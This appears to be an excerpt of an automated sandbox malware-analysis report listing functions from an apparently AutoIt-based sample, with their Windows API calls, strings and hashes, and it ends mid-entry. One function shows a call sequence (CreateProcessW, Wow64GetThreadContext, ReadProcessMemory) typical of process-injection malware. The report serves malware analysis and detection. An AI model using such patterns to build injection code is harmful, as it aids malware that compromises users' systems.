                                                    • Opcode Fuzzy Hash: 6b03b7f2b97d933b43cb383d224831eea6b4668af8839749f98b7b58078953ec
                                                    • Instruction Fuzzy Hash: DD919E71910219AFCF48EFA4C8919EEB7B6FF19314F00442DF816AB2D1DB31A905CBA4
                                                    Function 006035B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,006035A1,SwapMouseButtons,00000004,?), ref: 006035D4
                                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,006035A1,SwapMouseButtons,00000004,?,?,?,?,00602754), ref: 006035F5
                                                    • RegCloseKey.KERNELBASE(00000000,?,?,006035A1,SwapMouseButtons,00000004,?,?,?,?,00602754), ref: 00603617
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: CloseOpenQueryValue
                                                    • String ID: Control Panel\Mouse
                                                    • API String ID: 3677997916-824357125
                                                    • Opcode ID: 859b8539c35d1ef4eff5800ba3f1ebb9d3ad5f878abc35a0e50a8dafe01effa0
                                                    • Instruction ID: 7e9163d595a6ba6cd7ec6ab4840e6cae6fe1b5410c1f754977c7b8824851b7d2
                                                    • Opcode Fuzzy Hash: 859b8539c35d1ef4eff5800ba3f1ebb9d3ad5f878abc35a0e50a8dafe01effa0
                                                    • Instruction Fuzzy Hash: 83114871560228BFDB248F64DC409EFB7BEEF04741F105569E805D7350D6729E409760
                                                    Function 039412A0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 03941A5B
                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03941AF1
                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03941B13
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1662698170.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_3940000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                    • String ID:
                                                    • API String ID: 2438371351-0
                                                    • Opcode ID: e8e7a77c1c38f92167ec50984bffac71589908538948dc0fdf133907e09ee162
                                                    • Instruction ID: abe90e9741a395df23f5e71500950625dec9b202c4096bce0f68b5710a2f8c64
                                                    • Opcode Fuzzy Hash: e8e7a77c1c38f92167ec50984bffac71589908538948dc0fdf133907e09ee162
                                                    • Instruction Fuzzy Hash: 2F620A34A14258DBEB24CFA4C850BDEB376EF58300F1095A9D10DEB3A4E7769E81CB59
                                                    Function 006697E5 Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00605045: _fseek.LIBCMT ref: 0060505D
                                                      • Part of subcall function 006699BE: _wcscmp.LIBCMT ref: 00669AAE
                                                      • Part of subcall function 006699BE: _wcscmp.LIBCMT ref: 00669AC1
                                                    • _free.LIBCMT ref: 0066992C
                                                    • _free.LIBCMT ref: 00669933
                                                    • _free.LIBCMT ref: 0066999E
                                                      • Part of subcall function 00622F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00629C64), ref: 00622FA9
                                                      • Part of subcall function 00622F95: GetLastError.KERNEL32(00000000,?,00629C64), ref: 00622FBB
                                                    • _free.LIBCMT ref: 006699A6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                    • String ID:
                                                    • API String ID: 1552873950-0
                                                    • Opcode ID: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
                                                    • Instruction ID: cf5b8173e8e6ff888d9861c56c6078729c0ba83665e1dd59151dbed98408c69f
                                                    • Opcode Fuzzy Hash: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
                                                    • Instruction Fuzzy Hash: DA5160B1D04618AFDF649F64DC41A9EBB7AEF48300F0444AEB609A7281DB315E90CF68
                                                    Function 0062493A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                    • String ID:
                                                    • API String ID: 2782032738-0
                                                    • Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                                                    • Instruction ID: ed1454efaf99241e078d8c15f47215b6e2dc91e79534df33831290f2a760bd54
                                                    • Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                                                    • Instruction Fuzzy Hash: FB41C570A40E269FDB288E69E8809AF77A7EF84360B24816DE85587784DF719D818F44
                                                    Function 00604DD0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID: AU3!P/i$EA06
                                                    • API String ID: 4104443479-1974690362
                                                    • Opcode ID: 81fe232925127e9b28e61ab5ce950cc4d2c775f8309b8d36ebb64a2af3f0ad1b
                                                    • Instruction ID: 8d8456e964834134eee83141ee9d2c54b1dd53213918da3d6400b3965c2357b6
                                                    • Opcode Fuzzy Hash: 81fe232925127e9b28e61ab5ce950cc4d2c775f8309b8d36ebb64a2af3f0ad1b
                                                    • Instruction Fuzzy Hash: 264159A1A842546BCF399B64C8517FF7FA7AF41300F284079EE839A2C2DE619D4587E1
                                                    Function 006073E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _memset.LIBCMT ref: 0063EE62
                                                    • GetOpenFileNameW.COMDLG32(?), ref: 0063EEAC
                                                      • Part of subcall function 006048AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006048A1,?,?,006037C0,?), ref: 006048CE
                                                      • Part of subcall function 006209D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 006209F4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Name$Path$FileFullLongOpen_memset
                                                    • String ID: X
                                                    • API String ID: 3777226403-3081909835
                                                    • Opcode ID: 95781814ca5bcce56d8943be7a7787c02889f52d420557adbc985fb8dc1eeadb
                                                    • Instruction ID: 08e2e396c4a95999d4b9dbb7fab62b9bb3aedf2260f34dda0a57180dfb69ab32
                                                    • Opcode Fuzzy Hash: 95781814ca5bcce56d8943be7a7787c02889f52d420557adbc985fb8dc1eeadb
                                                    • Instruction Fuzzy Hash: EC21F370E042589BCB55DF94C805BEE7BFE9F49310F00401AE509E7281DBB85A8A8FA5
                                                    Function 0066901B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: __fread_nolock_memmove
                                                    • String ID: EA06
                                                    • API String ID: 1988441806-3962188686
                                                    • Opcode ID: e73854eb92944dcd75179acb1ef2b288a67729884bf837217f80b0962a7f6e90
                                                    • Instruction ID: bb1d103c28cbaad564c71e6f6ec73f7fe5c8c3223c2c87ba835780ba3e8afea9
                                                    • Opcode Fuzzy Hash: e73854eb92944dcd75179acb1ef2b288a67729884bf837217f80b0962a7f6e90
                                                    • Instruction Fuzzy Hash: D901F971804628AEDB28C6A8D816EFE7BFC9B15301F00419EF552D2181E5B9E6048B60
                                                    Function 00669B6D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetTempPathW.KERNEL32(00000104,?), ref: 00669B82
                                                    • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00669B99
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Temp$FileNamePath
                                                    • String ID: aut
                                                    • API String ID: 3285503233-3010740371
                                                    • Opcode ID: 98c67859bb47877026f01668e4e860ddde15781d9c0ec1ac76ab17baae3813ec
                                                    • Instruction ID: d58f8b46d59d7964c7a7ecbc601b21df1c304bbe88164d4636c00f9f5c7dfd51
                                                    • Opcode Fuzzy Hash: 98c67859bb47877026f01668e4e860ddde15781d9c0ec1ac76ab17baae3813ec
                                                    • Instruction Fuzzy Hash: 25D05E7954030DBBDB609BD0DC4EFDA776DE704700F0046A1BE54D10A1DEB156988B91
                                                    Function 0067CDF1 Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8584cc8b730b1b75287d1f0cffbbd4ca8f1d9b47f3f865fa2a941f5a67853ffd
                                                    • Instruction ID: 3bd10d35e4e450fed5ab2182a06a7f27f376dd6996317c8f7180fd44feea81f8
                                                    • Opcode Fuzzy Hash: 8584cc8b730b1b75287d1f0cffbbd4ca8f1d9b47f3f865fa2a941f5a67853ffd
                                                    • Instruction Fuzzy Hash: 14F127706083019FC754DF28C484A6ABBE6FF88314F54892DF8A99B352D731E946CF96
                                                    Function 006043DB Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _memset.LIBCMT ref: 00604401
                                                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 006044A6
                                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 006044C3
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: IconNotifyShell_$_memset
                                                    • String ID:
                                                    • API String ID: 1505330794-0
                                                    • Opcode ID: 7aca128d40dcb0e0e8e7b6296de349660c8c558da7639c8ba9324ae90e2b3e5c
                                                    • Instruction ID: b0a86889aa287078211776c345a7404eeb877866d42c3e5bf9e208fca772cf56
                                                    • Opcode Fuzzy Hash: 7aca128d40dcb0e0e8e7b6296de349660c8c558da7639c8ba9324ae90e2b3e5c
                                                    • Instruction Fuzzy Hash: 723184B15047119FD774DF24D884BABBBE9FB48304F00092EF69A83391DB75AA44CB96
                                                    Function 0062594C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • __FF_MSGBANNER.LIBCMT ref: 00625963
                                                      • Part of subcall function 0062A3AB: __NMSG_WRITE.LIBCMT ref: 0062A3D2
                                                      • Part of subcall function 0062A3AB: __NMSG_WRITE.LIBCMT ref: 0062A3DC
                                                    • __NMSG_WRITE.LIBCMT ref: 0062596A
                                                      • Part of subcall function 0062A408: GetModuleFileNameW.KERNEL32(00000000,006C43BA,00000104,?,00000001,00000000), ref: 0062A49A
                                                      • Part of subcall function 0062A408: ___crtMessageBoxW.LIBCMT ref: 0062A548
                                                      • Part of subcall function 006232DF: ___crtCorExitProcess.LIBCMT ref: 006232E5
                                                      • Part of subcall function 006232DF: ExitProcess.KERNEL32 ref: 006232EE
                                                      • Part of subcall function 00628D68: __getptd_noexit.LIBCMT ref: 00628D68
                                                    • RtlAllocateHeap.NTDLL(01300000,00000000,00000001,00000000,?,?,?,00621013,?), ref: 0062598F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                    • String ID:
                                                    • API String ID: 1372826849-0
                                                    • Opcode ID: 036ef1dfb818534ea6f5ed395508659c5dcbe4eae1ca4df28c180138504cecbe
                                                    • Instruction ID: 10a5570a70f864fb0eaa2eef1bb9dcb314f97ba69dc883e437c3ebb3463bfc66
                                                    • Opcode Fuzzy Hash: 036ef1dfb818534ea6f5ed395508659c5dcbe4eae1ca4df28c180138504cecbe
                                                    • Instruction Fuzzy Hash: 7A010431641F72DED6207764FC12AA9324B8F41770F10002AF402A72C1CE708D814E69
                                                    Function 00669B2C Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,006697D2,?,?,?,?,?,00000004), ref: 00669B45
                                                    • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,006697D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00669B5B
                                                    • CloseHandle.KERNEL32(00000000,?,006697D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00669B62
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: File$CloseCreateHandleTime
                                                    • String ID:
                                                    • API String ID: 3397143404-0
                                                    • Opcode ID: 43cded33f89aed0062d0726dbb03583677db450a21350ac39fb13768053b8718
                                                    • Instruction ID: 142f21c2ec475d685746de92a9645f7807808840cae28af79c3da2b71fee1fa1
                                                    • Opcode Fuzzy Hash: 43cded33f89aed0062d0726dbb03583677db450a21350ac39fb13768053b8718
                                                    • Instruction Fuzzy Hash: 48E08632180214B7D7212B54EC0DFCA7B1AEB05761F104220FB54A90E087B125219798
                                                    Function 00668F97 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _free.LIBCMT ref: 00668FA5
                                                      • Part of subcall function 00622F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00629C64), ref: 00622FA9
                                                      • Part of subcall function 00622F95: GetLastError.KERNEL32(00000000,?,00629C64), ref: 00622FBB
                                                    • _free.LIBCMT ref: 00668FB6
                                                    • _free.LIBCMT ref: 00668FC8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    • Opcode ID: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
                                                    • Instruction ID: 37cbacd6469dce2bcd72fd28bf24f651d5f2b43d21b50231432f4d78c2d11f70
                                                    • Opcode Fuzzy Hash: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
                                                    • Instruction Fuzzy Hash: 36E012A1609B125FCA64A978BE51AD357EF5F48390718091DB409DB242DE34E8518528
                                                    Function 0060AB23 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: CALL
                                                    • API String ID: 0-4196123274
                                                    • Opcode ID: c564bd25a99341761f2331a1739b331555072d3c26446d84e2228f22470d1614
                                                    • Instruction ID: 6d78d4af3cdf367f74ed6120fe17febd83f352c40602114a8e87b33eda4d1747
                                                    • Opcode Fuzzy Hash: c564bd25a99341761f2331a1739b331555072d3c26446d84e2228f22470d1614
                                                    • Instruction Fuzzy Hash: BC223670548351CFDB28DF54C494A6BBBE2BF84340F15895DE88A8B3A2D731ED85CB86
                                                    Function 0060492E Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • IsThemeActive.UXTHEME ref: 00604992
                                                      • Part of subcall function 006235AC: __lock.LIBCMT ref: 006235B2
                                                      • Part of subcall function 006235AC: DecodePointer.KERNEL32(00000001,?,006049A7,006581BC), ref: 006235BE
                                                      • Part of subcall function 006235AC: EncodePointer.KERNEL32(?,?,006049A7,006581BC), ref: 006235C9
                                                      • Part of subcall function 00604A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00604A73
                                                      • Part of subcall function 00604A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00604A88
                                                      • Part of subcall function 00603B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00603B7A
                                                      • Part of subcall function 00603B4C: IsDebuggerPresent.KERNEL32 ref: 00603B8C
                                                      • Part of subcall function 00603B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,006C62F8,006C62E0,?,?), ref: 00603BFD
                                                      • Part of subcall function 00603B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00603C81
                                                    • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 006049D2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                    • String ID:
                                                    • API String ID: 1438897964-0
                                                    • Opcode ID: 1544f880f04030b0f8c2193567444331beb8ee10b35783077cf1882ccc6c878c
                                                    • Instruction ID: e48cd093eedc6e601cb3a33fde44b9fbc2a0c595fd0babae5b58c373924f33cf
                                                    • Opcode Fuzzy Hash: 1544f880f04030b0f8c2193567444331beb8ee10b35783077cf1882ccc6c878c
                                                    • Instruction Fuzzy Hash: B6118C719483119BC314DF29EC05D1BFBEAEB94710F00851EF445832A1DB749A45CB9A
                                                    Function 00605DF9 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00605981,?,?,?,?), ref: 00605E27
                                                    • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00605981,?,?,?,?), ref: 0063E19C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 619aaabe1949ea15ac64a7936bf5e37b3f8723b2a016095a561ffb0016d74b1b
